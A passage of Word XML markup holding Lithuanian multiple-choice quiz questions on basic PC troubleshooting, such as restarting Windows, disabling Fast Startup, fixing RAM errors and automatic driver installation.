          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>į</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> dešinės pelės klavišu ir langelyje pasirinkti </w:t>
      </w:r>
      <w:r w:rsidR="00760AD6" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="003F006A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>aleisti iš naujo</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="0009651A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="00E714B2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ngl. - r</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>estart)</w:t>
      </w:r>
      <w:r w:rsidR="18638010" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34CE5B95" w14:textId="2509AE66" w:rsidR="001B4643" w:rsidRPr="005A5C28" w:rsidRDefault="3DCD9A45" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">B) </w:t>
      </w:r>
      <w:r w:rsidR="001B4643" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>Reikia išjungti kompiuterį</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005C1497" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>pa</w:t>
      </w:r>
      <w:r w:rsidR="00AB18A7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve">spaudus </w:t>
      </w:r>
      <w:r w:rsidR="001B0A63" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>Įjung</w:t>
      </w:r>
      <w:r w:rsidR="00AB18A7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>imo</w:t>
      </w:r>
      <w:r w:rsidR="00AB18A7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> mygtuką </w:t>
      </w:r>
      <w:r w:rsidR="001B4643" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve">arba paspausti mygtuką </w:t>
      </w:r>
      <w:r w:rsidR="005C1497" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Paleisti iš naujo</w:t>
      </w:r>
      <w:r w:rsidR="001B4643" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="00E714B2" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>angl. - r</w:t>
      </w:r>
      <w:r w:rsidR="001B4643" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>eset</w:t>
      </w:r>
      <w:r w:rsidR="212F2864" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="723CC8CC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652860B1" w14:textId="69BE21B7" w:rsidR="001B4643" w:rsidRPr="005A5C28" w:rsidRDefault="3DCD9A45" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">C) </w:t>
      </w:r>
      <w:r w:rsidR="001B4643" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve">Gali padėti greitojo </w:t>
      </w:r>
      <w:r w:rsidR="005C1497" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>paleid</w:t>
      </w:r>
      <w:r w:rsidR="001B4643" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve">imo (Fast Startup) išjungimas per Windows meniu </w:t>
      </w:r>
      <w:r w:rsidR="000842C9" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>Energijos vartojimo</w:t>
      </w:r>
      <w:r w:rsidR="001B4643" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Power Options) nustatymuose.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E7731D8" w14:textId="59125AD0" w:rsidR="69303C30" w:rsidRPr="005A5C28" w:rsidRDefault="69303C30" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0008D9B0" w14:textId="3B98788F" w:rsidR="005D53E4" w:rsidRPr="005A5C28" w:rsidRDefault="0252D4B2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">7. </w:t>
      </w:r>
      <w:r w:rsidR="3DCD9A45" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Kaip sprendžiam</w:t>
      </w:r>
      <w:r w:rsidR="64F5A4AE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>os</w:t>
      </w:r>
      <w:r w:rsidR="3DCD9A45" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> operatyvinės atminties klaidos?</w:t>
      </w:r>
      <w:r w:rsidR="005D53E4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Pažymėkite teisingą atsakymą.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="244565FD" w14:textId="53A7649C" w:rsidR="00085E49" w:rsidRPr="005A5C28" w:rsidRDefault="00085E49" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>A) Reiki</w:t>
      </w:r>
      <w:r w:rsidR="00CF235F" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> išjungti kompiuterį ne per meni</w:t>
      </w:r>
      <w:r w:rsidR="00760AD6" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>u</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve">, bet paspaudus </w:t>
      </w:r>
      <w:r w:rsidR="003A744C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve">Išjungimo </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>mygtuką</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Power Off) arba </w:t>
      </w:r>
      <w:r w:rsidR="00760AD6" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>sisteminio bloko korpuse</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve">paspausti mygtuką </w:t>
      </w:r>
      <w:r w:rsidR="003A744C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>Palesti iš naujo</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Reset)</w:t>
      </w:r>
      <w:r w:rsidR="27ED451B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15665AFA" w14:textId="47740665" w:rsidR="00085E49" w:rsidRPr="005A5C28" w:rsidRDefault="00085E49" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve">B) Reikia perstatyti operatyvinę atmintį iš vieno lizdo į kitą arba pakeisti ją nauja atmintimi, </w:t>
      </w:r>
      <w:r w:rsidR="00760AD6" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>be to,</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>reikia pravalyti lizdus su švari</w:t>
      </w:r>
      <w:r w:rsidR="00760AD6" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>u</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> teptuku</w:t>
      </w:r>
      <w:r w:rsidR="00760AD6" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>, o</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>operatyvinę atmintį</w:t>
      </w:r>
      <w:r w:rsidR="00760AD6" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>su trintuk</w:t>
      </w:r>
      <w:r w:rsidR="00760AD6" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>u</w:t>
      </w:r>
      <w:r w:rsidR="6AC94BB4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163FAC25" w14:textId="7A24D037" w:rsidR="0B4A386B" w:rsidRPr="005A5C28" w:rsidRDefault="00085E49" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve">C) Reikia peržiūrėti automatinį </w:t>
      </w:r>
      <w:r w:rsidR="00477E78" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>paleid</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>imą,</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>išjungti automatinius atnaujinimus ir</w:t>
      </w:r>
      <w:r w:rsidR="00760AD6" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> iš automatino paleidimo (Startup Apps) failo</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>išjungti viską, kas yra nereikaling</w:t>
      </w:r>
      <w:r w:rsidR="005D53E4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="00760AD6" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365E5919" w14:textId="77777777" w:rsidR="000D73E9" w:rsidRPr="005A5C28" w:rsidRDefault="000D73E9" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49D9E846" w14:textId="5E3FE9C4" w:rsidR="005D53E4" w:rsidRPr="005A5C28" w:rsidRDefault="4510FA92" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">8. </w:t>
      </w:r>
      <w:r w:rsidR="3DCD9A45" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Ar tvarkyklių diegimas automatini</w:t>
      </w:r>
      <w:r w:rsidR="005D53E4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>u</w:t>
      </w:r>
      <w:r w:rsidR="3DCD9A45" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> būd</w:t>
      </w:r>
      <w:r w:rsidR="00CF235F" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>u</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="3DCD9A45" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Windows 10 užtikrina sistemos stabilų veikimą?</w:t>
      </w:r>
      <w:r w:rsidR="005D53E4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Pažymėkite teisingą atsakymą.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7863F072" w14:textId="75B1A01B" w:rsidR="69303C30" w:rsidRPr="005A5C28" w:rsidRDefault="3DCD9A45"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A) Taip</w:t>
      </w:r>
      <w:r w:rsidR="732E2C2C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7EB9A6" w14:textId="6EE78927" w:rsidR="69303C30" w:rsidRPr="005A5C28" w:rsidRDefault="3DCD9A45"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B) Ne</w:t>
      </w:r>
      <w:r w:rsidR="7689409D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>būtinai</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>, nes priklauso nuo PC konfig</w:t>
      </w:r>
      <w:r w:rsidR="32371636" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ūracijos</w:t>
      </w:r>
      <w:r w:rsidR="6FFF7014" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F69DB5" w14:textId="4B5E8021" w:rsidR="69303C30" w:rsidRPr="005A5C28" w:rsidRDefault="3DCD9A45"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 xml:space="preserve">C) </w:t>
      </w:r>
      <w:r w:rsidR="008E2128" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Ne, </w:t>
      </w:r>
      <w:r w:rsidR="00DA59E0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">jei </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
